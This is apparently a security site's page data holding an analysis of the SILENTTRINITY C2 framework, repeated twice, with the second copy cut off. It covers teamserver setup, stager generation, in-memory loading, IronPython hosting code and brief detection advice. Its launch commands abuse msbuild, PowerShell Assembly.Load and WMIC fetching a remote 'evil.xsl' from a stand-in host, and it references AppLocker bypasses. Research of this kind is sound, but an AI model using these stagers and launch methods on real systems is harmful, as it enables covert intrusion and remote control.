[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fO8cm6A7jCOMYQgI-KWnsMpK55SvKiYseNcKKcqMCLWs":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},871,"What is SILENTTRINITY and why is it notable for C2 operations?","SILENTTRINITY is an open-source C2 framework implemented in C# that uses the IronPython engine to execute Python payloads directly from memory, making it stealthy and difficult to detect with traditional file-based signatures. This technique of loading code without writing to disk is similar to methods analyzed in [AtomBombing Exploitation Analysis](\u002Fnews\u002Fatombombing-exploitation-analysis), where code injection occurs entirely in memory.","\u003Cp>SILENTTRINITY is an open-source C2 framework implemented in C# that uses the IronPython engine to execute Python payloads directly from memory, making it stealthy and difficult to detect with traditional file-based signatures. This technique of loading code without writing to disk is similar to methods analyzed in [AtomBombing Exploitation Analysis](\u002Fnews\u002Fatombombing-exploitation-analysis), where code injection occurs entirely in memory.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fsilenttrinity-usage-analysis\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-silenttrinity-and-why-is-it-notable-for-c2-operations-1777481709022","SILENTTRINITY, C2, IronPython, memory loading, stealth",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},213,"SILENTTRINITY Usage Analysis","silenttrinity-usage-analysis","Technical analysis of SILENTTRINITY, a C# C2 tool using IronPython for stealthy payload execution. Covers implementation, usage, and defense strategies.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SILENTTRINITY is a C2 tool open-sourced by byt3bl33d3r, implemented in C# and utilizing the IronPython engine to execute Python code, making it highly worthy of research. This tool implements payloads through Python, not only improving efficiency but also leveraging the IronPython engine to load payloads from memory, making it more stealthy.\u003C\u002Fp>\u003Cp>This article will analyze the principles of SILENTTRINITY from a technical research perspective, explore its extensions, and finally provide recommendations for defense and detection.\u003C\u002Fp>\u003Cp>Address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fbyt3bl33d3r\u002FSILENTTRINITY\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Basic usage of SILENTTRINITY\u003C\u002Fli>\u003Cli>Implementation details of SILENTTRINITY\u003C\u002Fli>\u003Cli>Methods for C# to call Python using IronPython\u003C\u002Fli>\u003Cli>Recommendations for defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Usage of SILENTTRINITY\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The operation method is similar to meterpreter\u003C\u002Fp>\u003Ch3>1. Installation\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone https:\u002F\u002Fgithub.com\u002Fbyt3bl33d3r\u002FSILENTTRINITY.git\u003Cbr>cd SILENTTRINITY\u003Cbr>python3 -m pip install -r requirements.txt\u003Cbr>python3 st.py\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Start the teamserver\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python3 teamserver.py \u003Cteamserver_ip> \u003Cteamserver_password>\u003C\u002Fteamserver_password>\u003C\u002Fteamserver_ip>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Connect to the teamserver\u003C\u002Fh3>\u003Cp>python3 st.py wss:\u002F\u002Fusername:\u003Cteamserver_password>@\u003Cteamserver_ip>:5000\u003C\u002Fteamserver_ip>\u003C\u002Fteamserver_password>\u003C\u002Fp>\u003Ch3>4. Start a listener\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>listeners\u003Cbr>use http\u003Cbr>options\u003Cbr>start\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5. Generate payload\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>stagers\u003Cbr>list\u003Cbr>use msbuild\u003Cbr>generate http\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>6. One of the startup methods\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe msbuild.xml\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Implementation details of SILENTTRINITY\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The file structure of the source code is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>SILENTTRINITY, core file, developed in C#, format is exe\u003C\u002Fli>\u003Cli>SILENTTRINITY_DLL, same content as above, but format is dll\u003C\u002Fli>\u003Cli>Server, control side, includes multiple payloads implemented in Python\u003C\u002Fli>\u003C\u002Ful>\u003Cp>SILENTTRINITY and SILENTTRINITY_DLL have the same functionality, only the file format differs, so here we take SILENTTRINITY as an example\u003C\u002Fp>\u003Ch3>1. SILENTTRINITY\u003C\u002Fh3>\u003Cp>The implemented functionality can be referenced in the right half of the figure below:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017239628_0_0e4a233e6d.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Image cited from https:\u002F\u002Fgithub.com\u002Fbyt3bl33d3r\u002FSILENTTRINITY\u003C\u002Fp>\u003Cp>Detailed description is as follows:\u003C\u002Fp>\u003Ch4>1. Start the IronPython engine, release resource files, and import them into the Python environment\u003C\u002Fh4>\u003Cp>Resource file name: IronPython.StdLib.2.7.9.zip\u003C\u002Fp>\u003Cp>The files within the compressed package are default Python modules\u003C\u002Fp>\u003Cp>If IronPython is installed, the files in the compressed package are consistent with those in the default installation path C:\\Program Files\\IronPython 2.7\\Lib\u003C\u002Fp>\u003Cp>IronPython download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FIronLanguages\u002Fironpython2\u002Freleases\u002Ftag\u002Fipy-2.7.9\u003C\u002Fp>\u003Ch4>2. Download stage.zip from the Server\u003C\u002Fh4>\u003Cp>stage.zip contains five files:\u003C\u002Fp>\u003Cul>\u003Cli>IronPython.dll\u003C\u002Fli>\u003Cli>IronPython.Modules.dll\u003C\u002Fli>\u003Cli>Microsoft.Dynamic.dll\u003C\u002Fli>\u003Cli>Microsoft.Scripting.dll\u003C\u002Fli>\u003Cli>Main.py\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Among these, the first four are dependency files of the IronPython engine, while Main.py is the main program used to receive control commands, load payloads, and return output results.\u003C\u002Fp>\u003Ch4>3. Utilizing IronPython to call Python\u003C\u002Fh4>\u003Cp>This will be explained in detail later.\u003C\u002Fp>\u003Ch3>2. Server\u003C\u002Fh3>\u003Cp>Serves as the control end\u003C\u002Fp>\u003Cp>The modules folder contains all supported Python scripts.\u003C\u002Fp>\u003Cp>The stagers folder includes three startup methods:\u003C\u002Fp>\u003Cul>\u003Cli>msbuild\u003C\u002Fli>\u003Cli>powershell\u003C\u002Fli>\u003Cli>wmic\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>1. msbuild\u003C\u002Fh4>\u003Cp>Startup method:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe msbuild.xml\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Process:\u003C\u002Fp>\u003Cp>msbuild.exe -&gt; .xml -&gt; C#\u003C\u002Fp>\u003Cp>Load msbuild.xml via msbuild.exe, utilizing the new feature \"Inline Tasks\" supported in .NET Framework 4.0, which is included in the UsingTask element and can be used to execute C# code in XML files.\u003C\u002Fp>\u003Cp>msbuild.xml implements base64 decoding of encrypted strings, decrypts SILENTTRINITY, and finally loads it in memory (C# implementation).\u003C\u002Fp>\u003Cp>I have previously analyzed this exploitation method in an article:\u003C\u002Fp>\u003Cp>\"Use MSBuild To Do More\"\u003C\u002Fp>\u003Ch4>2. powershell\u003C\u002Fh4>\u003Cp>Startup method:\u003C\u002Fp>\u003Cp>Execute PowerShell script\u003C\u002Fp>\u003Cp>Process:\u003C\u002Fp>\u003Cp>powershell.exe -&gt; .ps1 -&gt; C#\u003C\u002Fp>\u003Cp>Similarly, base64 decoding of encrypted strings is performed, decrypting SILENTTRINITY and finally loading it in memory (PowerShell implementation). The key code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$asm = [Reflection.Assembly]::Load($UncompressedFileBytes)\u003Cbr>$type = $asm.GetType(\"ST\")\u003Cbr>$main = $type.GetMethod(\"Main\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Indicates loading the ST method under Main in the exe\u003C\u002Fp>\u003Cp>I have previously analyzed this exploitation method in an article:\u003C\u002Fp>\u003Cp>\"Analysis Summary of Bypassing Applocker Using Assembly Load &amp; LoadFile\"\u003C\u002Fp>\u003Ch4>3. wmic\u003C\u002Fh4>\u003Cp>Startup method:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\System32\\wbem\\WMIC.exe os get \u002Fformat:\"evil.xsl\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\System32\\wbem\\WMIC.exe os get \u002Fformat:\"https:\u002F\u002Fexample.com\u002Fevil.xsl\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Process:\u003C\u002Fp>\u003Cp>wmic.exe -&gt; .xsl -&gt; javascript\u003C\u002Fp>\u003Cp>Load wmic.xsl via wmic.exe; wmic.xsl can be stored locally or on a remote server\u003C\u002Fp>\u003Cp>Similarly, the encrypted string is base64 decoded to decrypt SILENTTRINITY, ultimately loading it in memory (implemented via JavaScript)\u003C\u002Fp>\u003Cp>I have previously analyzed this exploitation method in an article:\u003C\u002Fp>\u003Cp>Analysis and Utilization of Invoking XSL Files via WMIC\u003C\u002Fp>\u003Ch4>4. Other Available Methods for Exploitation\u003C\u002Fh4>\u003Cp>SILENTTRINITY not included, here as an extension, for example:\u003C\u002Fp>\u003Cul>\u003Cli>regsvr32.exe, \"Code Execution of Regsvr32.exe\"\u003C\u002Fli>\u003Cli>rundll32.exe, \"Analysis on Utilizing Rundll32 for Program Execution\"\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Method of Using C# to Invoke Python via IronPython\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Requires IronPython, reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fironpython.net\u002F\u003C\u002Fp>\u003Cp>This section introduces some basic usage to help further extend the functionality of SILENTTRINITY\u003C\u002Fp>\u003Ch3>1. Commonly Used Basic Scripts\u003C\u002Fh3>\u003Cp>Download and install IronPython:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FIronLanguages\u002Fironpython2\u002Ftree\u002Fmaster\u002FSrc\u002FIronPythonCompiler\u003C\u002Fp>\u003Cp>Development tool: VS2015\u003C\u002Fp>\u003Cp>Create a new C# project, add references:\u003C\u002Fp>\u003Cul>\u003Cli>IronPython\u003C\u002Fli>\u003Cli>Microsoft.Scripting\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The generated exe after compilation requires the following dependency files:\u003C\u002Fp>\u003Cul>\u003Cli>IronPython.dll\u003C\u002Fli>\u003Cli>IronPython.Modules.dll (some projects do not require this)\u003C\u002Fli>\u003Cli>Microsoft.Dynamic.dll\u003C\u002Fli>\u003Cli>Microsoft.Scripting.dll\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>1. A simple hello world program, calling test.py, outputs Hello World\u003C\u002Fh4>\u003Cp>code1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>            engine.ExecuteFile(\"test.py\");\u003Cbr>\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>test.py:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>print(\"Hello World\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Pass parameters to the Python script and output\u003C\u002Fh4>\u003Cp>code2:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>\u003Cbr>            var scope = engine.CreateScope();\u003Cbr>\u003Cbr>            scope.SetVariable(\"argv\", \"Hello World\");\u003Cbr>\u003Cbr>            engine.ExecuteFile(\"test.py\",scope);\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>test.py:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>print('%s'%argv)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Call the main function of the Python script\u003C\u002Fh4>\u003Cp>code3:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>            var scope = engine.CreateScope();\u003Cbr>            engine.ExecuteFile(\"test.py\",scope);\u003Cbr>\u003Cbr>            dynamic main = scope.GetVariable(\"main\");\u003Cbr>\u003Cbr>            main();\u003Cbr>\u003Cbr>\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>test.py:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>def main():\u003Cbr>        print(\"Hello World\")\u003Cbr>if __name__ == '__main__':\u003Cbr>\tmain(\"\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Store the content of the Python script in a variable and execute it\u003C\u002Fh4>\u003Cp>code4:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            string script = \"print('%s'%argv)\";\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>            var scope = engine.CreateScope();\u003Cbr>            scope.SetVariable(\"argv\", \"Hello World\");\u003Cbr>            var sourceCode = engine.CreateScriptSourceFromString(script);\u003Cbr>            sourceCode.Execute(scope);\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Python scripts support third-party libraries\u003C\u002Fh4>\u003Cp>code5:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>            engine.SetSearchPaths(new[] { \"Lib\" });\u003Cbr>            engine.ExecuteFile(\"test.py\");\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Find the installation path of IronPython, default is C:\\Program Files\\IronPython 2.7\u003C\u002Fp>\u003Cp>Copy the Lib directory from there to the same directory as the compiled IronPythonTest.exe\u003C\u002Fp>\u003Cp>test.py:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import os\u003Cbr>os.system(\"calc.exe\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Use ipyc to compile Python scripts into exe\u003C\u002Fh3>\u003Cp>Similar to py2exe functionality\u003C\u002Fp>\u003Cp>Source code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FIronLanguages\u002Fironpython2\u002Ftree\u002Fmaster\u002FSrc\u002FIronPythonCompiler\u003C\u002Fp>\u003Cp>Compiled files can be obtained from the IronPython directory\u003C\u002Fp>\u003Cp>Default installation location:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Program Files\\IronPython 2.7\\ipyc.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SILENTTRINITY's launcher itself does not contain malicious functions; it merely downloads files from a remote server and utilizes IronPython to invoke Python, which is a completely normal feature\u003C\u002Fp>\u003Cp>The launch method leverages programs inherent to the Windows system (e.g., msbuild.exe, powershell.exe, wmic.exe, and can also be extended to regsvr32.exe or rundll32.exe), making it relatively stealthy\u003C\u002Fp>\u003Cp>However, SILENTTRINITY needs to initiate network connections to transmit stage.zip and Python scripts. Therefore, if a program invokes IronPython and initiates network connections, it is highly likely to be risky behavior\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes the implementation details of SILENTTRINITY, proposes some extension ideas, introduces the method of using IronPython in C# to call Python, and provides defense and detection recommendations based on the characteristics of SILENTTRINITY.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SILENTTRINITY is a C2 tool open-sourced by byt3bl33d3r, implemented in C# and utilizing the IronPython engine to execute Python code, making it highly worthy of research. This tool implements payloads through Python, not only improving efficiency but also leveraging the IronPython engine to load payloads from memory, making it more stealthy.\u003C\u002Fp>\u003Cp>This article will analyze the principles of SILENTTRINITY from a technical research perspective, explore its extensions, and finally provide recommendations for defense and detection.\u003C\u002Fp>\u003Cp>Address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fbyt3bl33d3r\u002FSILENTTRINITY\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Basic usage of SILENTTRINITY\u003C\u002Fli>\u003Cli>Implementation details of SILENTTRINITY\u003C\u002Fli>\u003Cli>Methods for C# to call Python using IronPython\u003C\u002Fli>\u003Cli>Recommendations for defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Usage of SILENTTRINITY\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The operation method is similar to meterpreter\u003C\u002Fp>\u003Ch3>1. Installation\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone https:\u002F\u002Fgithub.com\u002Fbyt3bl33d3r\u002FSILENTTRINITY.git\u003Cbr>cd SILENTTRINITY\u003Cbr>python3 -m pip install -r requirements.txt\u003Cbr>python3 st.py\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Start the teamserver\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python3 teamserver.py \u003Cteamserver_ip> \u003Cteamserver_password>\u003C\u002Fteamserver_password>\u003C\u002Fteamserver_ip>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Connect to the teamserver\u003C\u002Fh3>\u003Cp>python3 st.py wss:\u002F\u002Fusername:\u003Cteamserver_password>@\u003Cteamserver_ip>:5000\u003C\u002Fteamserver_ip>\u003C\u002Fteamserver_password>\u003C\u002Fp>\u003Ch3>4. Start a listener\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>listeners\u003Cbr>use http\u003Cbr>options\u003Cbr>start\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5. Generate payload\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>stagers\u003Cbr>list\u003Cbr>use msbuild\u003Cbr>generate http\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>6. One of the startup methods\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe msbuild.xml\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Implementation details of SILENTTRINITY\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The file structure of the source code is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>SILENTTRINITY, core file, developed in C#, format is exe\u003C\u002Fli>\u003Cli>SILENTTRINITY_DLL, same content as above, but format is dll\u003C\u002Fli>\u003Cli>Server, control side, includes multiple payloads implemented in Python\u003C\u002Fli>\u003C\u002Ful>\u003Cp>SILENTTRINITY and SILENTTRINITY_DLL have the same functionality, only the file format differs, so here we take SILENTTRINITY as an example\u003C\u002Fp>\u003Ch3>1. SILENTTRINITY\u003C\u002Fh3>\u003Cp>The implemented functionality can be referenced in the right half of the figure below:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017239628_0_0e4a233e6d-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Image cited from https:\u002F\u002Fgithub.com\u002Fbyt3bl33d3r\u002FSILENTTRINITY\u003C\u002Fp>\u003Cp>Detailed description is as follows:\u003C\u002Fp>\u003Ch4>1. Start the IronPython engine, release resource files, and import them into the Python environment\u003C\u002Fh4>\u003Cp>Resource file name: IronPython.StdLib.2.7.9.zip\u003C\u002Fp>\u003Cp>The files within the compressed package are default Python modules\u003C\u002Fp>\u003Cp>If IronPython is installed, the files in the compressed package are consistent with those in the default installation path C:\\Program Files\\IronPython 2.7\\Lib\u003C\u002Fp>\u003Cp>IronPython download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FIronLanguages\u002Fironpython2\u002Freleases\u002Ftag\u002Fipy-2.7.9\u003C\u002Fp>\u003Ch4>2. Download stage.zip from the Server\u003C\u002Fh4>\u003Cp>stage.zip contains five files:\u003C\u002Fp>\u003Cul>\u003Cli>IronPython.dll\u003C\u002Fli>\u003Cli>IronPython.Modules.dll\u003C\u002Fli>\u003Cli>Microsoft.Dynamic.dll\u003C\u002Fli>\u003Cli>Microsoft.Scripting.dll\u003C\u002Fli>\u003Cli>Main.py\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Among these, the first four are dependency files of the IronPython engine, while Main.py is the main program used to receive control commands, load payloads, and return output results.\u003C\u002Fp>\u003Ch4>3. Utilizing IronPython to call Python\u003C\u002Fh4>\u003Cp>This will be explained in detail later.\u003C\u002Fp>\u003Ch3>2. Server\u003C\u002Fh3>\u003Cp>Serves as the control end\u003C\u002Fp>\u003Cp>The modules folder contains all supported Python scripts.\u003C\u002Fp>\u003Cp>The stagers folder includes three startup methods:\u003C\u002Fp>\u003Cul>\u003Cli>msbuild\u003C\u002Fli>\u003Cli>powershell\u003C\u002Fli>\u003Cli>wmic\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>1. msbuild\u003C\u002Fh4>\u003Cp>Startup method:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe msbuild.xml\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Process:\u003C\u002Fp>\u003Cp>msbuild.exe -&gt; .xml -&gt; C#\u003C\u002Fp>\u003Cp>Load msbuild.xml via msbuild.exe, utilizing the new feature \"Inline Tasks\" supported in .NET Framework 4.0, which is included in the UsingTask element and can be used to execute C# code in XML files.\u003C\u002Fp>\u003Cp>msbuild.xml implements base64 decoding of encrypted strings, decrypts SILENTTRINITY, and finally loads it in memory (C# implementation).\u003C\u002Fp>\u003Cp>I have previously analyzed this exploitation method in an article:\u003C\u002Fp>\u003Cp>\"Use MSBuild To Do More\"\u003C\u002Fp>\u003Ch4>2. powershell\u003C\u002Fh4>\u003Cp>Startup method:\u003C\u002Fp>\u003Cp>Execute PowerShell script\u003C\u002Fp>\u003Cp>Process:\u003C\u002Fp>\u003Cp>powershell.exe -&gt; .ps1 -&gt; C#\u003C\u002Fp>\u003Cp>Similarly, base64 decoding of encrypted strings is performed, decrypting SILENTTRINITY and finally loading it in memory (PowerShell implementation). The key code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$asm = [Reflection.Assembly]::Load($UncompressedFileBytes)\u003Cbr>$type = $asm.GetType(\"ST\")\u003Cbr>$main = $type.GetMethod(\"Main\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Indicates loading the ST method under Main in the exe\u003C\u002Fp>\u003Cp>I have previously analyzed this exploitation method in an article:\u003C\u002Fp>\u003Cp>\"Analysis Summary of Bypassing Applocker Using Assembly Load &amp; LoadFile\"\u003C\u002Fp>\u003Ch4>3. wmic\u003C\u002Fh4>\u003Cp>Startup method:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\System32\\wbem\\WMIC.exe os get 